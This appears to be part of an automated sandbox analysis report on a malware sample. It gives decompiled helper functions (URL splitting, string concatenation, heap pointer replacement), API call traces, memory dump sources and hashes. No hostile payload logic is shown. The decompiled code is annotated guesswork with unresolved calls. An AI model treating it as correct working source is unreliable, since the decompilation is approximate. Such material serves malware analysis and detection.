                            					if(_t5[0x16] == 0) { // wait until the busy field clears
                            						break;
                            					}
                            					Sleep(0xa);
                            				}
                            				_t7 =  *0xf1d35c; // 0x57f95b0
                            				_t10 =  *_t7;
                            				if(_t10 != 0 && _t10 != 0xf1e823) { // never free the built-in default
                            					HeapFree( *0xf1d270, 0, _t10);
                            					_t7 =  *0xf1d35c; // 0x57f95b0
                            				}
                            				 *_t7 = _v0; // new pointer (unmodelled stack argument)
                            				_t8 =  &(_t7[0x10]);
                            				__imp__(_t8); // RtlLeaveCriticalSection
                            				return _t8;
                            			}

                            Statement-by-statement instruction addresses for E00F14D70 span 0x00f14d70 to 0x00f14dcc; the original listing gives one per statement, with 0x00000000 for jumps that emit no code.

                            APIs
                            • RtlEnterCriticalSection.NTDLL(057F9570), ref: 00F14D79
                            • Sleep.KERNEL32(0000000A), ref: 00F14D83
                            • HeapFree.KERNEL32(00000000), ref: 00F14DB1
                            • RtlLeaveCriticalSection.NTDLL(057F9570), ref: 00F14DC6
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                            • String ID:
                            • API String ID: 58946197-0
                            • Opcode ID: 65f37ea38158ca2b4e47c88627b40932a91560669c106493e7d80dad49035e9d
                            • Instruction ID: a3ee0ea350ef2178308d28b12783abb8d58520c2875163c46a3dcefbd42474b0
                            • Opcode Fuzzy Hash: 65f37ea38158ca2b4e47c88627b40932a91560669c106493e7d80dad49035e9d
                            • Instruction Fuzzy Hash: A2F0F878640249DFEB189B65EC59BE977B4AB49714B0BC119E902C7360C730EC44FE51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 58%
                            // Annotation: splits the URL string _a4 into a host part (*_a8) and a path part
                            // (*_a12), each in its own buffer from E00F155DC (E00F16DFA is the matching free).
                            // The unresolved __imp__ calls are presumably lstrlen (first) and lstrcpy (the
                            // two later ones); their names are not resolved in this part of the listing.
                            // E00F1AAD2 appears to return a pointer to the next '/' or NULL: a "//" right
                            // after the first '/' (a scheme prefix) is skipped and the search restarted; with
                            // no further '/' the host is the whole remainder and the path is "/". Returns 1
                            // on success and 0 when either allocation fails.
                            			E00F1282F(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                            				intOrPtr* _v8;
                            				void* _t17;
                            				intOrPtr* _t22;
                            				void* _t27;
                            				char* _t30;
                            				void* _t33;
                            				void* _t34;
                            				void* _t36;
                            				void* _t37;
                            				void* _t39;
                            				int _t42;
                            
                            				_t17 = __eax;
                            				_t37 = 0;
                            				__imp__(_a4, _t33, _t36, _t27, __ecx); // lstrlen(_a4); the decompiler does not show its result landing in _t17
                            				_t2 = _t17 + 1; // 0x1  (really lstrlen(_a4) + 1: room for the terminator)
                            				_t28 = _t2;
                            				_t34 = E00F155DC(_t2); // host buffer
                            				if(_t34 != 0) {
                            					_t30 = E00F155DC(_t28); // path buffer
                            					if(_t30 == 0) {
                            						E00F16DFA(_t34);
                            					} else {
                            						_t39 = _a4;
                            						_t22 = E00F1AAD2(_t39); // first '/'
                            						_v8 = _t22;
                            						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) { // not "//": keep the original start
                            							_a4 = _t39;
                            						} else {
                            							_t26 = _t22 + 2; // skip "scheme://"
                            							_a4 = _t22 + 2;
                            							_t22 = E00F1AAD2(_t26); // next '/' after the host
                            							_v8 = _t22;
                            						}
                            						if(_t22 == 0) { // no path: host = rest of the string, path = "/"
                            							__imp__(_t34, _a4);
                            							 *_t30 = 0x2f;
                            							 *((char*)(_t30 + 1)) = 0;
                            						} else {
                            							_t42 = _t22 - _a4; // host length
                            							memcpy(_t34, _a4, _t42);
                            							 *((char*)(_t34 + _t42)) = 0;
                            							__imp__(_t30, _v8); // path, starting at the '/'
                            						}
                            						 *_a8 = _t34;
                            						_t37 = 1;
                            						 *_a12 = _t30;
                            					}
                            				}
                            				return _t37;
                            			}

                            Disassembly address column (instruction text not extracted): 0x00f1282f, 0x00f12839, 0x00f1283b, 0x00f12841, 0x00f12841, 0x00f1284a, 0x00f1284e, 0x00f1285a, 0x00f1285e, 0x00f128d2, 0x00f12860, 0x00f12860, 0x00f12864, 0x00f1286b, 0x00f1286e, 0x00f12888, 0x00f12877, 0x00f12877, 0x00f1287b, 0x00f1287e, 0x00f12883, 0x00f12883, 0x00f1288d, 0x00f128b5, 0x00f128bb, 0x00f128be, 0x00f1288f, 0x00f12891, 0x00f12899, 0x00f128a4, 0x00f128a9, 0x00f128a9, 0x00f128c5, 0x00f128cc, 0x00f128cd, 0x00f128cd, 0x00f1285e, 0x00f128dd

                            APIs
                            • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,00F156E4,00000000,00000000,?,057F9618,?,?,00F13B91,?,057F9618), ref: 00F1283B
                              • Part of subcall function 00F155DC: RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                              • Part of subcall function 00F1AAD2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00F12869,00000000,00000001,00000001,?,?,00F156E4,00000000,00000000,?,057F9618), ref: 00F1AAE0
                              • Part of subcall function 00F1AAD2: StrChrA.SHLWAPI(?,0000003F,?,?,00F156E4,00000000,00000000,?,057F9618,?,?,00F13B91,?,057F9618,0000EA60,?), ref: 00F1AAEA
                            • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00F156E4,00000000,00000000,?,057F9618,?,?,00F13B91), ref: 00F12899
                            • lstrcpy.KERNEL32(00000000,?), ref: 00F128A9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00F128B5
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                            • String ID:
                            • API String ID: 3767559652-0
                            • Opcode ID: 6b0874b157fa219d27efc6f2e446f62d55e60733ccab1ab64c6a6d423241aede
                            • Instruction ID: 3f2f7f6a985f582bc480ca816722afe3bc5c7399627efe099e1bc02204734e70
                            • Opcode Fuzzy Hash: 6b0874b157fa219d27efc6f2e446f62d55e60733ccab1ab64c6a6d423241aede
                            • Instruction Fuzzy Hash: E521D272900259EFCB026FA4CC44AEE7FA9EF45360B158055FC099B201DB38CD94E7E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			// Decompiled helper: concatenates the wide strings _a4 and _a8 into a new heap
                            			// buffer and returns it (0 if the allocation fails). The unused __ecx register
                            			// argument of the original calling convention is omitted.
                            			WCHAR* E00F15434(WCHAR* _a4, WCHAR* _a8) {
                            				WCHAR* _v8;
                            				int _t25;      // lstrlenW(_a8), in characters
                            				int _t29;      // lstrlenW(_a4), in characters
                            				int _t34;      // byte length of _a4
                            
                            				_t29 = lstrlenW(_a4);                                 // ref: 00F15444
                            				_t25 = lstrlenW(_a8);                                 // ref: 00F1544B
                            				// (len1 + len2) * sizeof(WCHAR) + 2 bytes for the terminating NUL
                            				_v8 = E00F155DC(_t25 + _t29 + _t25 + _t29 + 2);       // RtlAllocateHeap wrapper
                            				if(_v8 != 0) {
                            					_t34 = _t29 + _t29;
                            					memcpy(_v8, _a4, _t34);                           // first string without its NUL
                            					memcpy((char*)_v8 + _t34, _a8, _t25 + _t25 + 2);  // second string including its NUL
                            				}
                            				return _v8;
                            			}

                            Disassembly address column (instruction text not extracted): 0x00f15449, 0x00f1544d, 0x00f15457, 0x00f1545e, 0x00f15461, 0x00f15463, 0x00f1546b, 0x00f15470, 0x00f1547e, 0x00f15483, 0x00f1548d

                            APIs
                            • lstrlenW.KERNEL32(?,?,75145520,00000008,057F93AC,?,00F14CD5,?,057F93AC,?,?,?,?,?,?,00F150D9), ref: 00F15444
                            • lstrlenW.KERNEL32(00F14CD5,?,00F14CD5,?,057F93AC,?,?,?,?,?,?,00F150D9), ref: 00F1544B
                              • Part of subcall function 00F155DC: RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                            • memcpy.NTDLL(00000000,?,751469A0,?,?,00F14CD5,?,057F93AC,?,?,?,?,?,?,00F150D9), ref: 00F1546B
                            • memcpy.NTDLL(751469A0,00F14CD5,00000002,00000000,?,751469A0,?,?,00F14CD5,?,057F93AC), ref: 00F1547E
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: lstrlenmemcpy$AllocateHeap
                            • String ID:
                            • API String ID: 2411391700-0
                            • Opcode ID: 156ccbd1a41cdb164d4919527080668a4e05b8ba11a21356f87194dcf39af4ee
                            • Instruction ID: f6965b1466e8d8484b56b105221cbb55d1da90cccff3e00c516848b8cf0ba0a4
                            • Opcode Fuzzy Hash: 156ccbd1a41cdb164d4919527080668a4e05b8ba11a21356f87194dcf39af4ee
                            • Instruction Fuzzy Hash: 7FF0EC76900118FB8B11EFA9CC45CDE7BADEF492647154062B904D7112E635EA549BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(057F9B58,00000000,00000000,?,00F16507,00000000), ref: 00F16F7D
                            • lstrlen.KERNEL32(?), ref: 00F16F85
                              • Part of subcall function 00F155DC: RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                            • lstrcpy.KERNEL32(00000000,057F9B58), ref: 00F16F99
                            • lstrcat.KERNEL32(00000000,?), ref: 00F16FA4
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                            • String ID:
                            • API String ID: 74227042-0
                            • Opcode ID: 57c739673a057708ff26b3588b0db8df3b9dce1b0531965942c7e5a6db3a884b
                            • Instruction ID: c360f1229790389d9e73d583b903e795f0b8938384f70f3c8e8755e17ad47ee2
                            • Opcode Fuzzy Hash: 57c739673a057708ff26b3588b0db8df3b9dce1b0531965942c7e5a6db3a884b
                            • Instruction Fuzzy Hash: 4CE09273901629AB86119BE4AC48CDFBBADEF8D6213064416F600D3120C7248909ABE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Executed Functions

                            Memory Dump Source
                            • Source File: 00000015.00000003.381882541.0000016FB52B0000.00000010.00000001.sdmp, Offset: 0000016FB52B0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                            • Instruction ID: 7ad26f74a82f6467cc1439eeaab4d924af8d9ffb660d0aec1dcb288eacb1507f
                            • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                            • Instruction Fuzzy Hash: 8890021859640A55D41A15915C8929C50406388250FD44594441690144D84E43971152
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000015.00000003.381882541.0000016FB52B0000.00000010.00000001.sdmp, Offset: 0000016FB52B0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                            • Instruction ID: 7ad26f74a82f6467cc1439eeaab4d924af8d9ffb660d0aec1dcb288eacb1507f
                            • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                            • Instruction Fuzzy Hash: 8890021859640A55D41A15915C8929C50406388250FD44594441690144D84E43971152
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Executed Functions

                            Memory Dump Source
                            • Source File: 00000016.00000003.382595885.0000018A39B90000.00000010.00000001.sdmp, Offset: 0000018A39B90000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                            • Instruction ID: 98c16c77023d54fb21c31ae25183d19c3007d8208f876fa41224b0e53b21ea17
                            • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                            • Instruction Fuzzy Hash: BA9002154A544666E41415910C4539C5040778E250FD884814816D0144D94D03965263
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000016.00000003.382595885.0000018A39B90000.00000010.00000001.sdmp, Offset: 0000018A39B90000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                            • Instruction ID: 98c16c77023d54fb21c31ae25183d19c3007d8208f876fa41224b0e53b21ea17
                            • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                            • Instruction Fuzzy Hash: BA9002154A544666E41415910C4539C5040778E250FD884814816D0144D94D03965263
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Executed Functions

                            Memory Dump Source
                            • Source File: 00000017.00000003.382294090.000002BDF3C20000.00000010.00000001.sdmp, Offset: 000002BDF3C20000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                            • Instruction ID: 3b435a7f9153779b040b92df0c51ec4d6adfdbc3eb07541b0b7015aa64eacde9
                            • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                            • Instruction Fuzzy Hash: 6B90020C4D941656D41411910C492AC61406388360FDA8481881790944E54D42965152
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000017.00000003.382294090.000002BDF3C20000.00000010.00000001.sdmp, Offset: 000002BDF3C20000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                            • Instruction ID: 3b435a7f9153779b040b92df0c51ec4d6adfdbc3eb07541b0b7015aa64eacde9
                            • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                            • Instruction Fuzzy Hash: 6B90020C4D941656D41411910C492AC61406388360FDA8481881790944E54D42965152
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Executed Functions

                            Memory Dump Source
                            • Source File: 0000001E.00000003.398425500.000001A8BC780000.00000010.00000001.sdmp, Offset: 000001A8BC780000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                            • Instruction ID: c5428663922cad8c1e0c73542435281898873ced1f7fdccdd5d9321f5650e4d5
                            • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                            • Instruction Fuzzy Hash: FC90025459640655D41411970D492AC5050678D250FD48480891690145D84D02971167
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000001E.00000003.398425500.000001A8BC780000.00000010.00000001.sdmp, Offset: 000001A8BC780000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                            • Instruction ID: c5428663922cad8c1e0c73542435281898873ced1f7fdccdd5d9321f5650e4d5
                            • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                            • Instruction Fuzzy Hash: FC90025459640655D41411970D492AC5050678D250FD48480891690145D84D02971167
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions